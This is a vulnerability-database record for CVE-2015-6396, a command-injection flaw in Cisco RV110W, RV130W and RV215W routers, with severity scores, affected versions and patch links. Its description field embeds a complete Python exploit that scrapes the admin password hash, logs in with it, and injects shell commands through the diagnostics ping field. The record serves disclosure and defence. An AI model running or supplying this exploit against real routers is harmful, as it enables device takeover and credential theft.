Details of VAR-201608-0273

ID

VAR-201608-0273

CVE

CVE-2015-6396

TITLE

plural Cisco Device product CLI Any command with administrator privileges in the command parser shell Command execution vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-007226

DESCRIPTION

The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. A local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. This issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. The following products are affected: RV110W Wireless-N VPN Firewall RV130W Wireless-N Multifunction VPN Router RV215W Wireless-N VPN Router. #!/usr/bin/env python2 ##### ## Cisco RV110W Password Disclosure and OS Command Execute. ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute # Date: 2018-08 # Exploit Author: RySh # Vendor Homepage: https://www.cisco.com/ # Version: 1.1.0.9 # Tested on: RV110W 1.1.0.9 # CVE : CVE-2014-0683, CVE-2015-6396 import os import sys import re import urllib import urllib2 import getopt import json import ssl ssl._create_default_https_context = ssl._create_unverified_context ### # Usage: ./{script_name} 192.168.1.1 443 "reboot" ### if __name__ == "__main__": IP = argv[1] PORT = argv[2] CMD = argv[3] # Get session key, Just access index page. url = 'https://' + IP + ':' + PORT + '/' req = urllib2.Request(url) result = urllib2.urlopen(req) res = result.read() # parse 'admin_pwd'! -- Get credits admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1] admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:] print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd # Get session_id by POST req2 = urllib2.Request(url + "login.cgi") req2.add_header('Origin', url) req2.add_header('Upgrade-Insecure-Requests', 1) req2.add_header('Content-Type', 'application/x-www-form-urlencoded') req2.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req2.add_header('Referer', url) req2.add_header('Accept-Encoding', 'gzip, deflate') req2.add_header('Accept-Language', 'en-US,en;q=0.9') req2.add_header('Cookie', 'SessionID=') data = {"submit_button": "login", "submit_type": "", "gui_action": "", "wait_time": "0", "change_action": "", "enc": "1", "user": admin_user, "pwd": admin_pwd, "sel_lang": "EN" } r = urllib2.urlopen(req2, urllib.urlencode(data)) resp = r.read() login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] # Execute your commands via diagnose command parameter, default command is `reboot` req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) req3.add_header('Origin', url) req3.add_header('Upgrade-Insecure-Requests', 1) req3.add_header('Content-Type', 'application/x-www-form-urlencoded') req3.add_header('User-Agent', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') req3.add_header('Referer', url) req3.add_header('Accept-Encoding', 'gzip, deflate') req3.add_header('Accept-Language', 'en-US,en;q=0.9') req3.add_header('Cookie', 'SessionID=') data_cmd = {"submit_button": "Diagnostics", "change_action": "gozila_cgi", "submit_type": "start_ping", "gui_action": "", "traceroute_ip": "", "commit": "1", "ping_times": "3 |" + CMD + "|", "ping_size": "64", "wait_time": "4", "ping_ip": "127.0.0.1", "lookup_name": "" } r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

Trust: 2.61

sources: NVD: CVE-2015-6396 // JVNDB: JVNDB-2015-007226 // CNVD: CNVD-2016-06162 // BID: 92269 // VULHUB: VHN-84357 // PACKETSTORM: 150781

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2016-06162

AFFECTED PRODUCTS

vendor:	cisco	model:	rv110w wireless-n vpn firewall	scope:	-	version:	-	Trust: 1.2
vendor:	cisco	model:	rv130w wireless-n multifunction vpn router	scope:	-	version:	-	Trust: 1.2
vendor:	cisco	model:	rv215w wireless-n vpn router	scope:	-	version:	-	Trust: 1.2
vendor:	cisco	model:	rv215w wireless-n vpn router	scope:	eq	version:	*	Trust: 1.0
vendor:	cisco	model:	rv110w wireless-n vpn firewall	scope:	eq	version:	*	Trust: 1.0
vendor:	cisco	model:	rv130w wireless-n multifunction vpn router	scope:	eq	version:	*	Trust: 1.0
vendor:	cisco	model:	rv110w wireless-n vpn firewall	scope:	eq	version:	-	Trust: 0.8
vendor:	cisco	model:	rv130w wireless-n multifunction vpn router	scope:	eq	version:	-	Trust: 0.8
vendor:	cisco	model:	rv215w wireless-n vpn router	scope:	eq	version:	-	Trust: 0.8
vendor:	cisco	model:	rv215w wireless-n vpn router	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	rv130w wireless-n multifunction vpn router	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	rv110w wireless-n vpn firewall	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	rv215w wireless-n vpn router	scope:	ne	version:	1.3.0.8	Trust: 0.3
vendor:	cisco	model:	rv130w wireless-n multifunction vpn router	scope:	ne	version:	1.0.3.16	Trust: 0.3
vendor:	cisco	model:	rv110w wireless-n vpn firewall	scope:	ne	version:	1.2.1.7	Trust: 0.3

sources: CNVD: CNVD-2016-06162 // BID: 92269 // JVNDB: JVNDB-2015-007226 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2015-6396
value:	HIGH
Trust: 1.0
NVD:	CVE-2015-6396
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2016-06162
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201608-173
value:	HIGH
Trust: 0.6
VULHUB:	VHN-84357
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2015-6396
severity:	HIGH
baseScore:	7.2
vectorString:	AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.9
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2016-06162
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-84357
severity:	HIGH
baseScore:	7.2
vectorString:	AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.9
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2015-6396
baseSeverity:	HIGH
baseScore:	7.8
vectorString:	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector:	LOCAL
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	1.8
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2016-06162 // VULHUB: VHN-84357 // JVNDB: JVNDB-2015-007226 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

PROBLEMTYPE DATA

problemtype:

CWE-78

Trust: 1.9

sources: VULHUB: VHN-84357 // JVNDB: JVNDB-2015-007226 // NVD: CVE-2015-6396

THREAT TYPE

local

Trust: 0.9

sources: BID: 92269 // CNNVD: CNNVD-201608-173

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201608-173

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007226

PATCH

title:	cisco-sa-20160803-rv110_130w1	url:	http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1	Trust: 0.8
title:	Patches for any command execution vulnerability in multiple Cisco products	url:	https://www.cnvd.org.cn/patchInfo/show/80243	Trust: 0.6
title:	Cisco RV110W , RV130W and RV215W Repair measures for device security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63566	Trust: 0.6

sources: CNVD: CNVD-2016-06162 // JVNDB: JVNDB-2015-007226 // CNNVD: CNNVD-201608-173

EXTERNAL IDS

db:	NVD	id:	CVE-2015-6396	Trust: 3.5
db:	BID	id:	92269	Trust: 2.0
db:	EXPLOIT-DB	id:	45986	Trust: 1.1
db:	SECTRACK	id:	1036528	Trust: 1.1
db:	JVNDB	id:	JVNDB-2015-007226	Trust: 0.8
db:	CNNVD	id:	CNNVD-201608-173	Trust: 0.7
db:	AUSCERT	id:	ESB-2016.1890	Trust: 0.6
db:	CNVD	id:	CNVD-2016-06162	Trust: 0.6
db:	VULHUB	id:	VHN-84357	Trust: 0.1
db:	PACKETSTORM	id:	150781	Trust: 0.1

sources: CNVD: CNVD-2016-06162 // VULHUB: VHN-84357 // BID: 92269 // JVNDB: JVNDB-2015-007226 // PACKETSTORM: 150781 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

REFERENCES

url:	http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1	Trust: 2.0
url:	http://www.securityfocus.com/bid/92269	Trust: 1.1
url:	https://www.exploit-db.com/exploits/45986/	Trust: 1.1
url:	http://www.securitytracker.com/id/1036528	Trust: 1.1
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6396	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6396	Trust: 0.8
url:	https://www.auscert.org.au/render.html?it=37422	Trust: 0.6
url:	http://www.cisco.com/	Trust: 0.4
url:	https://'	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-0683	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2015-6396	Trust: 0.1

sources: CNVD: CNVD-2016-06162 // VULHUB: VHN-84357 // BID: 92269 // JVNDB: JVNDB-2015-007226 // PACKETSTORM: 150781 // CNNVD: CNNVD-201608-173 // NVD: CVE-2015-6396

CREDITS

Adam Zielinski.

Trust: 0.3

sources: BID: 92269

SOURCES

db:	CNVD	id:	CNVD-2016-06162
db:	VULHUB	id:	VHN-84357
db:	BID	id:	92269
db:	JVNDB	id:	JVNDB-2015-007226
db:	PACKETSTORM	id:	150781
db:	CNNVD	id:	CNNVD-201608-173
db:	NVD	id:	CVE-2015-6396

LAST UPDATE DATE

2024-11-23T21:55:27.059000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2016-06162	date:	2016-08-09T00:00:00
db:	VULHUB	id:	VHN-84357	date:	2018-12-15T00:00:00
db:	BID	id:	92269	date:	2016-08-03T00:00:00
db:	JVNDB	id:	JVNDB-2015-007226	date:	2016-08-17T00:00:00
db:	CNNVD	id:	CNNVD-201608-173	date:	2016-08-08T00:00:00
db:	NVD	id:	CVE-2015-6396	date:	2024-11-21T02:34:55.313

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2016-06162	date:	2016-08-09T00:00:00
db:	VULHUB	id:	VHN-84357	date:	2016-08-08T00:00:00
db:	BID	id:	92269	date:	2016-08-03T00:00:00
db:	JVNDB	id:	JVNDB-2015-007226	date:	2016-08-17T00:00:00
db:	PACKETSTORM	id:	150781	date:	2018-12-14T18:00:57
db:	CNNVD	id:	CNNVD-201608-173	date:	2016-08-08T00:00:00
db:	NVD	id:	CVE-2015-6396	date:	2016-08-08T00:59:00.140